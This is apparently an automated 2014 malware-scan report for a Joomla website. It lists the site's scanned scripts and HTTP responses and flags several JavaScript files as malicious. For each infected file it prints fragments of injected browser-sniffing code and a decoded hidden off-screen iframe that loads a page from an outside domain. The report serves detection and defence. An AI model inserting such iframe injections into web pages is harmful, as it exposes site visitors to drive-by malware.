Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ilal.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ilal.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 12 Jul 2014 01:28:50 GMT Location: http://www.ilal.ru/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=cgg0g9l9jrgl9d3knrq3anf0e5; path=/ X-Powered-By: PHP/5.3.3 | clean |
http://www.ilal.ru/ | 200 OK Content-Length: 98725 Content-Type: text/html | clean |
http://www.ilal.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 29622 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch subscribe: function(o,g){return this.ajax('JCommentsSubscribe',arguments);}, unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);}, updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}}, go: function(l){window.open(l);return;} };;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://ilal.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 6204 Content-Type: application/x-javascript | clean |
http://www.ilal.ru/templates/gk_corporate2/js/domready_fix.js | 200 OK Content-Length: 3429 Content-Type: application/x-javascript | clean |
http://ilal.ru/media/system/js/caption.js | 200 OK Content-Length: 4308 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch container.className = container.className + " " + align; container.setAttribute("style","float:"+align); if (!docMode|| docMode < 8) { container.style.width = width + "px"; } } } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://www.ilal.ru/modules/mod_gk_tab/scripts/engine_compress.js | 200 OK Content-Length: 5681 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://www.ilal.ru/modules/mod_gk_tab/scripts/importer.php?modid=tabs_right_1&activator=click&animation=0&animationFun=Fx.Transitions.linear&animationType=1&animationSpeed=250&animationInterval=5000&styleType=0&styleSuffix=style1&fixedHeight=0&fixedHeightValue=200&alwaysHide=0 | 200 OK Content-Length: 388 Content-Type: text/javascript | clean |
http://www.ilal.ru/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js | 200 OK Content-Length: 4714 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://www.ilal.ru/modules/mod_gk_news_highlighter/scripts/engine_compress.js | 200 OK Content-Length: 6858 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://www.ilal.ru/modules/mod_gk_news_highlighter/scripts/importer.php?module_id=news-highlight-1&animation_type=1&animation_speed=250&animation_interval=5000&animation_fun=Fx.Transitions.linear&mouseover=1 | 200 OK Content-Length: 252 Content-Type: text/javascript | clean |
http://www.ilal.ru/templates/gk_corporate2/js/gk.script.js | 200 OK Content-Length: 9243 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var uneindex = 0; if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) { return uneindex; } return false; } function view_user(){ var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch element.addEvent('click',function(event){ var event = new Event(event); event.preventDefault(); changeStyle(index+1); }); }); new SmoothScroll(); } }); function changeStyle(style){ var file = tmplurl+'/css/style'+style+'.css'; new Asset.css(file); new Cookie.set('gk36_style',style,{duration: 200,path: "/"}); };;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src="http://clean.daluz.ro/ghfdgytriyfuofyhfgeg19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe> Antivirus reports:
| ||
http://www.ilal.ru/templates/gk_corporate2/js/menu/mega.js | 200 OK Content-Length: 20339 Content-Type: application/x-javascript | clean |
http://www.ilal.ru/templates/gk_corporate2/js/gk_image_show.js | 200 OK Content-Length: 10244 Content-Type: application/x-javascript | clean |
http://ilal.ru/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 12 Jul 2014 01:28:56 GMT Location: http://www.ilal.ru/index.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=ekg5dtr27lvijn9gjipqts9q75; path=/ X-Powered-By: PHP/5.3.3 | clean |
http://www.ilal.ru/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 12 Jul 2014 01:28:56 GMT Location: http://www.ilal.ru/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=g8ladjpfvpbgjo2mtch2utjf55; path=/ X-Powered-By: PHP/5.3.3 | clean |
http://www.ilal.ru/test404page.js | 404 Not Found Content-Length: 294 Content-Type: text/html | clean |
http://ilal.ru/bolezni/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 12 Jul 2014 01:28:56 GMT Location: http://www.ilal.ru/bolezni/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=6ao2qa77i04pb22u3c1g3grlp1; path=/ X-Powered-By: PHP/5.3.3 | clean |
http://www.ilal.ru/bolezni/ | 200 OK Content-Length: 25033 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ilal.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 12 Jul 2014 01:28:50 GMT
Location: http://www.ilal.ru/
Server: nginx/1.0.15
Content-Length: 0
Content-Type: text/html; charset=UTF-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=cgg0g9l9jrgl9d3knrq3anf0e5; path=/
X-Powered-By: PHP/5.3.3
...0 bytes of data.
GET / HTTP/1.1
Host: ilal.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 12 Jul 2014 01:28:50 GMT
Location: http://www.ilal.ru/
Server: nginx/1.0.15
Content-Length: 0
Content-Type: text/html; charset=UTF-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 4665e95581be4654bb2fae9ae81894cd=cgg0g9l9jrgl9d3knrq3anf0e5; path=/
X-Powered-By: PHP/5.3.3
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ilal.ru
Referer: http://www.google.com/search?q=ilal.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ilal.ru
Referer: http://www.google.com/search?q=ilal.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.